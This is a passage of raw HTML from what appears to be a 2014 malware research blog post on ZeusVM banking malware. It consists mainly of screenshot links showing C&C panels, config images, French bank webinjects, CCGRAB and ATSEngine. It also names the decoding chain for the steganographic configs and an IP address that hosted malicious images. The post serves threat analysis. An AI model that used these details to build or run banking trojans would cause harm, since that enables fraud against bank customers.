&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MQoFrD0jrPj8iYcL_z3X5iROL3fbRZRz3GkM9Un2xU6Eg94Br4g_IeK_rFmpxPod56FgoFjJJvelP59ZHNbHvxcJ1Ayzroec4nNl_ABY1zCIDSjlGSk_saQkmuJZfoBG8bNCaESxGSg/s1600/16-02-2014+16-49-12.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_MQoFrD0jrPj8iYcL_z3X5iROL3fbRZRz3GkM9Un2xU6Eg94Br4g_IeK_rFmpxPod56FgoFjJJvelP59ZHNbHvxcJ1Ayzroec4nNl_ABY1zCIDSjlGSk_saQkmuJZfoBG8bNCaESxGSg/s1600/16-02-2014+16-49-12.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzcBgrUSCYiLbKZFITWyk5yr6Fwz_5RocXbT4yEE37zGxjgWDw5iF9WwA9UJjwpo70WTcpTb7HzFYVb6GBfx8N22wTSUdxtXHZFhf3jbQZJPQkLg_KmRpyE0P90mgf_7cp0eLH9JRAt1k/s1600/16-02-2014+16-49-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzcBgrUSCYiLbKZFITWyk5yr6Fwz_5RocXbT4yEE37zGxjgWDw5iF9WwA9UJjwpo70WTcpTb7HzFYVb6GBfx8N22wTSUdxtXHZFhf3jbQZJPQkLg_KmRpyE0P90mgf_7cp0eLH9JRAt1k/s1600/16-02-2014+16-49-45.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/one/:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBdP5W4HRkoDBmm170ItxPJPoibic3JcPFl7IW6jyyDps8fcGFaaAFtXExgc4OOm4YBdh8Sy-HSwPBuFvtmDlMEJObO59kIxMalBH2A4UYWFIxk_fZcRiZE1ouUgtax7g_axc9gfsZ9qI/s1600/16-02-2014+16-52-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBdP5W4HRkoDBmm170ItxPJPoibic3JcPFl7IW6jyyDps8fcGFaaAFtXExgc4OOm4YBdh8Sy-HSwPBuFvtmDlMEJObO59kIxMalBH2A4UYWFIxk_fZcRiZE1ouUgtax7g_axc9gfsZ9qI/s1600/16-02-2014+16-52-53.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_zem6KPOPtGeofeO5U52xR2rq-S9jXNPD4OFGHCRLzI_MBdGUElG4A4U787mh5KsxwzJc8bRsjfZkvGaEXn_iebs-OODMH30sZEIMJ47vbz5y3VnChtQNjx7NrXKIDqe_vj_1g0EBqg/s1600/16-02-2014+16-53-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_zem6KPOPtGeofeO5U52xR2rq-S9jXNPD4OFGHCRLzI_MBdGUElG4A4U787mh5KsxwzJc8bRsjfZkvGaEXn_iebs-OODMH30sZEIMJ47vbz5y3VnChtQNjx7NrXKIDqe_vj_1g0EBqg/s1600/16-02-2014+16-53-28.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/two/ (unused):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI1Gz-Y5znfhyZ8OpIhn5at7fAACLXcSlXWW1JV57Kc132jfhyphenhyphenAK8Z2P2CzIqjcERMR4CUBETqUFXtRfJqmhobRGXEjdH3vgKhgVWciUOZCUojPJzs5U9J70tAAzJAx0DBnrBjE90TbqQ/s1600/16-02-2014+16-56-58.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI1Gz-Y5znfhyZ8OpIhn5at7fAACLXcSlXWW1JV57Kc132jfhyphenhyphenAK8Z2P2CzIqjcERMR4CUBETqUFXtRfJqmhobRGXEjdH3vgKhgVWciUOZCUojPJzs5U9J70tAAzJAx0DBnrBjE90TbqQ/s1600/16-02-2014+16-56-58.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;/&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/three/ (unused):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1AUMxogYV5Hd2AgBQT7XqRZ423cNlAaYrDbD8D89A4o00iPVrjdVmYDSi0E8zdyLZsnpRRcuZuiceD-TEvs2mj8Hf6IBc_N0jA4KA_b-EqtB7jOgn-laSjN5JN1EcEUFel5z_H9YyMc/s1600/16-02-2014+16-59-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1AUMxogYV5Hd2AgBQT7XqRZ423cNlAaYrDbD8D89A4o00iPVrjdVmYDSi0E8zdyLZsnpRRcuZuiceD-TEvs2mj8Hf6IBc_N0jA4KA_b-EqtB7jOgn-laSjN5JN1EcEUFel5z_H9YyMc/s1600/16-02-2014+16-59-05.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
/four/ (unused):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpDNKq2aHJidyE1XAhhFeHO0xZxxxqBTYBzYIedbFDAbHC7XM_vf43WJvtpTL5ijihtn8AI2rXVUxWSmgYcekySC84bq0wr7LND8D45CRzWLE86ka1dV6GF3KmtrcXYjEgN8OT-J_ZKQ8/s1600/16-02-2014+17-00-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpDNKq2aHJidyE1XAhhFeHO0xZxxxqBTYBzYIedbFDAbHC7XM_vf43WJvtpTL5ijihtn8AI2rXVUxWSmgYcekySC84bq0wr7LND8D45CRzWLE86ka1dV6GF3KmtrcXYjEgN8OT-J_ZKQ8/s1600/16-02-2014+17-00-42.png&quot; height=&quot;321&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now, for decoding those ZeusVM images, as described by Jerome, you just need to strip the image and do the following: Base64+RC4+VisualDecrypt+UCL Decompress&lt;br /&gt;
&lt;br /&gt;
Here are some &#39;malicious&#39; image from 212.44.64.202:&lt;br /&gt;
mix.jpg: &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjjZm2m4qpJdB8GqR3_toRaQpKTLmBoHrQunuFMS8eRBF1QrPXNnbl4uS8cJCQTfPEsv7FKphqg_-mUiHIicl9IfPE-yXOuQpjp_-vVXRfTXrge8Dr-sRQvCkLchTd60EsWFo1PnivZmQ/s1600/22-02-2014+19-00-47.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjjZm2m4qpJdB8GqR3_toRaQpKTLmBoHrQunuFMS8eRBF1QrPXNnbl4uS8cJCQTfPEsv7FKphqg_-mUiHIicl9IfPE-yXOuQpjp_-vVXRfTXrge8Dr-sRQvCkLchTd60EsWFo1PnivZmQ/s1600/22-02-2014+19-00-47.png&quot; height=&quot;318&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
mix.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpMSLBUT-EBog7YTQt3jG7PKzOVjqOGxZjebLzbagNdXR_j7shuwiOwNUnm3LyK6niybMZQWWGvujjnOQyjPLeVvAB_Frw9XwYcMJEVsfS_zX1dBO0jNsZHk4kCAXPcvOlXNAVUHn3Ogo/s1600/22-02-2014+18-51-59.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpMSLBUT-EBog7YTQt3jG7PKzOVjqOGxZjebLzbagNdXR_j7shuwiOwNUnm3LyK6niybMZQWWGvujjnOQyjPLeVvAB_Frw9XwYcMJEVsfS_zX1dBO0jNsZHk4kCAXPcvOlXNAVUHn3Ogo/s1600/22-02-2014+18-51-59.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
mix.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHYDJrmYp259orC6XEAGb5uqeCPekqvKqSjp3wTbJ9ccLEIbuvdL8URW1-i2aRe98BbCz8kS-mlDmjNtkz8MPS-7kmosMITGY7Y4sywpMNNKIILpk4O3GsFvRVtvPTnQSEVF1K7mi10I/s1600/22-02-2014+19-02-40.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUHYDJrmYp259orC6XEAGb5uqeCPekqvKqSjp3wTbJ9ccLEIbuvdL8URW1-i2aRe98BbCz8kS-mlDmjNtkz8MPS-7kmosMITGY7Y4sywpMNNKIILpk4O3GsFvRVtvPTnQSEVF1K7mi10I/s1600/22-02-2014+19-02-40.jpg&quot; height=&quot;270&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
mix.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii0AVykGJlOu7k1efWs7_fDYjLUSpnPzh_ahbBvlhQezqwkI9ibq5ovqSzmOxtA3nWRaYuxXtv3eMRt7a6vFf5D1z6fKQMlkST9abEMMqvzPowLpayLA6z9YqpPFHM5mOyrvqF-E-Paz4/s1600/22-02-2014+19-03-19.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii0AVykGJlOu7k1efWs7_fDYjLUSpnPzh_ahbBvlhQezqwkI9ibq5ovqSzmOxtA3nWRaYuxXtv3eMRt7a6vFf5D1z6fKQMlkST9abEMMqvzPowLpayLA6z9YqpPFHM5mOyrvqF-E-Paz4/s1600/22-02-2014+19-03-19.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
config.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsyhW3jiGeKTBBmJKH2zvEqBMtufWpYfxUXLO7Z78A18fVwjmTilkaR2pizpasGmFkttinDss531SYcyAieFuM8YG83quXUsVRXvhIjvqKEQTYkS_7q6NCPjlOYGQRF5T1jcz1jJ-Z5g/s1600/22-02-2014+18-54-43.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsyhW3jiGeKTBBmJKH2zvEqBMtufWpYfxUXLO7Z78A18fVwjmTilkaR2pizpasGmFkttinDss531SYcyAieFuM8YG83quXUsVRXvhIjvqKEQTYkS_7q6NCPjlOYGQRF5T1jcz1jJ-Z5g/s1600/22-02-2014+18-54-43.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
kartamestnosti.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReZvM8XlkiaXeOjOSLf-ZLFufdU3Gn241piEcN0i4eVs5PS_3161nfp8GimqT-sdwtGWN-zwjJo4lCIRR1nYD9cBpqvANhkpIkBgAJ7yXa8CukBLUaGqiqrc0xHlTuSfb2AL-TsWuHEM/s1600/22-02-2014+18-56-27.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReZvM8XlkiaXeOjOSLf-ZLFufdU3Gn241piEcN0i4eVs5PS_3161nfp8GimqT-sdwtGWN-zwjJo4lCIRR1nYD9cBpqvANhkpIkBgAJ7yXa8CukBLUaGqiqrc0xHlTuSfb2AL-TsWuHEM/s1600/22-02-2014+18-56-27.jpg&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
webi_test.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8C5-fInWeHkDHEC0FyPYduIlBDJI_oGpAGJi_hxY8Wei7X_SOMiqQrxDYYZl7En8DVwcpb_hxhWjB8eReoBbdeEfiMDlUfN4k0TSRQk6ENzW-SAYp_NT8evgUqeFz4PlS75K6iTK9WFQ/s1600/22-02-2014+18-57-09.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8C5-fInWeHkDHEC0FyPYduIlBDJI_oGpAGJi_hxY8Wei7X_SOMiqQrxDYYZl7En8DVwcpb_hxhWjB8eReoBbdeEfiMDlUfN4k0TSRQk6ENzW-SAYp_NT8evgUqeFz4PlS75K6iTK9WFQ/s1600/22-02-2014+18-57-09.png&quot; height=&quot;290&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
uwliottrekera.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib2Oljv4GXu30-ZG0_4gSr0TcDKA_ZKnQqkqSiydXAD7iky1xo9kgsCgGpLB_p8XCXb4wl5rf0K5omugrMFvHr9ZPA-neOGTLVl8abxhvHFKSPuLI6dJ25vOlSsOgBQTkubgANmQF1Mrg/s1600/22-02-2014+18-49-45.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib2Oljv4GXu30-ZG0_4gSr0TcDKA_ZKnQqkqSiydXAD7iky1xo9kgsCgGpLB_p8XCXb4wl5rf0K5omugrMFvHr9ZPA-neOGTLVl8abxhvHFKSPuLI6dJ25vOlSsOgBQTkubgANmQF1Mrg/s1600/22-02-2014+18-49-45.png&quot; height=&quot;185&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;test_vnc2.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYvLScj_laQZ1iRh9KTGdHClfSztnkX2P9auVr3w61gJs42sP7MMwf_X1A1RylJ1vdTtvk6CaoYY0GkXjc1WzXNk1OCufYJ6VgUfDRD8SVqhA1oRVOL3D52DlOIEXuXlNYpnr1D5aRvs4/s1600/22-02-2014+18-50-43.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYvLScj_laQZ1iRh9KTGdHClfSztnkX2P9auVr3w61gJs42sP7MMwf_X1A1RylJ1vdTtvk6CaoYY0GkXjc1WzXNk1OCufYJ6VgUfDRD8SVqhA1oRVOL3D52DlOIEXuXlNYpnr1D5aRvs4/s1600/22-02-2014+18-50-43.jpg&quot; height=&quot;223&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
x64hook.jpg:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJg9KkqfRICJVXPcPs1vnKRhMDQWNuwfx9PKpAL8_KGL1JNQAc-A0xzrDIu8DDDlXed9JmgVDyyeI1zlf2yiv6ef6VPt9lhPJGV-yVj_xpqt6juQcNCQDyZ04cqqs080rdZG9UkU_RGU/s1600/22-02-2014+18-58-21.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikJg9KkqfRICJVXPcPs1vnKRhMDQWNuwfx9PKpAL8_KGL1JNQAc-A0xzrDIu8DDDlXed9JmgVDyyeI1zlf2yiv6ef6VPt9lhPJGV-yVj_xpqt6juQcNCQDyZ04cqqs080rdZG9UkU_RGU/s1600/22-02-2014+18-58-21.jpg&quot; height=&quot;265&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Some configs was done for tests:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLlp11rexkVvUMBpLA-kL6XujmT87LYjEMreXb9DE80g4tmqFli1LxBl_n7ipRU5V_LYab9DC4nyqke1xLbyE4PViZA70QwH9k4iMPD-owX1CFxjZD8qWJ75GebbQS2sv5ZHtwiiu8tY/s1600/22-02-2014+19-13-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLlp11rexkVvUMBpLA-kL6XujmT87LYjEMreXb9DE80g4tmqFli1LxBl_n7ipRU5V_LYab9DC4nyqke1xLbyE4PViZA70QwH9k4iMPD-owX1CFxjZD8qWJ75GebbQS2sv5ZHtwiiu8tY/s1600/22-02-2014+19-13-30.png&quot; height=&quot;118&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVrzTcuIsFs7J8koqlh5kBtthtR-vZM_NHaYsaBb-a8hQALs6JBd1FC44Ny4k03w9R8oiwP_gRNUaLY0NDxU8mt3H5DGS1CEvEFSGI_H9VmXi-93Y3ZKZ0FHqXpX3gRz3cgsAF-z9LVPA/s1600/22-02-2014+19-14-10.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVrzTcuIsFs7J8koqlh5kBtthtR-vZM_NHaYsaBb-a8hQALs6JBd1FC44Ny4k03w9R8oiwP_gRNUaLY0NDxU8mt3H5DGS1CEvEFSGI_H9VmXi-93Y3ZKZ0FHqXpX3gRz3cgsAF-z9LVPA/s1600/22-02-2014+19-14-10.png&quot; height=&quot;118&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1YzqX7WikwNAciSZ9LnvOfFxpQbNI36cJDZhYolAM0gZEcz5Df8C34cNAJwhkskbhuvEcoybdIM1u5K93dMCYmJrd00jLrL_NprvSKoKRckI1JoZ7gAG-ab79tm1zQN7SGzsXUMNZjhY/s1600/22-02-2014+19-14-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1YzqX7WikwNAciSZ9LnvOfFxpQbNI36cJDZhYolAM0gZEcz5Df8C34cNAJwhkskbhuvEcoybdIM1u5K93dMCYmJrd00jLrL_NprvSKoKRckI1JoZ7gAG-ab79tm1zQN7SGzsXUMNZjhY/s1600/22-02-2014+19-14-43.png&quot; height=&quot;118&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And some wasn&#39;t for test, targeting banks with MiTB.&lt;br /&gt;
Malicious code injection, on a ZeusVM botnet targeting France: &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbJvUGr2nq0EQm3OeQUOE-9NEmv65G2M8FeVUwAGpy1wf-bof4OyVr57FSr1GwJjGz-qyYyPZLUy8b9MuJ1JJpSDsoswz5qOZqcoC5G-UFdlHKssWwPnDgV7ekRJm2VTwEpfdOn5Pc14/s1600/22-02-2014+19-48-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAbJvUGr2nq0EQm3OeQUOE-9NEmv65G2M8FeVUwAGpy1wf-bof4OyVr57FSr1GwJjGz-qyYyPZLUy8b9MuJ1JJpSDsoswz5qOZqcoC5G-UFdlHKssWwPnDgV7ekRJm2VTwEpfdOn5Pc14/s1600/22-02-2014+19-48-42.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Lame webinject:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3mkFDqTVuLhH_E1dp_e-NgHV5kEVxXJBKZqXJl_EfHlKgzgTows7NnQ2LnspvIUATsfaGdEhjyveFaLCmnFvYev5A-jV78TW0B6N0DZErTVY9YoAfymyiHbAMvfgYTYSUrM1gUzQHU3c/s1600/22-02-2014+20-23-03.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3mkFDqTVuLhH_E1dp_e-NgHV5kEVxXJBKZqXJl_EfHlKgzgTows7NnQ2LnspvIUATsfaGdEhjyveFaLCmnFvYev5A-jV78TW0B6N0DZErTVY9YoAfymyiHbAMvfgYTYSUrM1gUzQHU3c/s1600/22-02-2014+20-23-03.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsdArIvxQ2RC8Pst6qHJyDJAAw5-CuTgkkmRkmC0txyBX4NPHZiFqMYHKGnNK1gxENGBS8BCc9qdEKm_GqA2I2gkLDM3c4zVL3onyx40fEJWgSy5DDqYpjxqadWWS8zB8OSkwENjq69Q/s1600/22-02-2014+21-05-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsdArIvxQ2RC8Pst6qHJyDJAAw5-CuTgkkmRkmC0txyBX4NPHZiFqMYHKGnNK1gxENGBS8BCc9qdEKm_GqA2I2gkLDM3c4zVL3onyx40fEJWgSy5DDqYpjxqadWWS8zB8OSkwENjq69Q/s1600/22-02-2014+21-05-56.png&quot; height=&quot;378&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
CCGRAB:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1OkLl09qUgF5PLNjaVJymctBudjRF388Q-bIT6jvVzaj9PLr4-TYVSo8lM4JNjH4RsLGxAON4Cx9Wi_JMgOOHWmcP5ons47axSc97Rbxm1HFOF8-3YbSWd9brmwA9YeFLzVAq2gaZPXI/s1600/22-02-2014+18-37-52.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1OkLl09qUgF5PLNjaVJymctBudjRF388Q-bIT6jvVzaj9PLr4-TYVSo8lM4JNjH4RsLGxAON4Cx9Wi_JMgOOHWmcP5ons47axSc97Rbxm1HFOF8-3YbSWd9brmwA9YeFLzVAq2gaZPXI/s1600/22-02-2014+18-37-52.png&quot; height=&quot;118&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
ATSEngine:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi6Hv5opCXmteDRIkuO0z4wAP3zDUywDqAiaYIgTg_GQfi6YOl9_pOXqDbsu83sriM-ANNWpgd1FNdJQVsXZ6BjcVdNzcmAm_uRhrrRsttNkHAlhSL4CeVv7GMQFjK_RdcJ1kNcn3Vm5o/s1600/20-02-2014+14-21-35.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi6Hv5opCXmteDRIkuO0z4wAP3zDUywDqAiaYIgTg_GQfi6YOl9_pOXqDbsu83sriM-ANNWpgd1FNdJQVsXZ6BjcVdNzcmAm_uRhrrRsttNkHAlhSL4CeVv7GMQFjK_RdcJ1kNcn3Vm5o/s1600/20-02-2014+14-21-35.png&quot; height=&quot;202&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLkpWEmHBCYkWHdb9vV_4XqdmF0XKprq9pNQWcV3kLABR0o1QmPI8oCnq_p-D0AKvYEH8lCmak7E3lKMdH_gP90EzjD5DHNN1LRJ7iHYYO2lUIuFGj6HmM3sq1PfjDQ5IRj2dcFikmFow/s1600/20-02-2014+14-22-05.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLkpWEmHBCYkWHdb9vV_4XqdmF0XKprq9pNQWcV3kLABR0o1QmPI8oCnq_p-D0AKvYEH8lCmak7E3lKMdH_gP90EzjD5DHNN1LRJ7iHYYO2lUIuFGj6HmM3sq1PfjDQ5IRj2dcFikmFow/s1600/20-02-2014+14-22-05.png&quot; height=&quot;202&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Nowadays more actors start to use ZeusVM, like the group who was using the &#39;private&#39; version of &lt;a href=&quot;http://securityblog.s21sec.com/2014/02/citadel-involution.html&quot;&gt;Citadel 3.1.0.0&lt;/a&gt; and the group who was targeting &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1465&amp;amp;start=70#p20700&quot;&gt;Japan&lt;/a&gt;.&lt;br /&gt;
Both switched on ZeusVM as alternative of Citadel.&lt;br /&gt;
&lt;br /&gt;
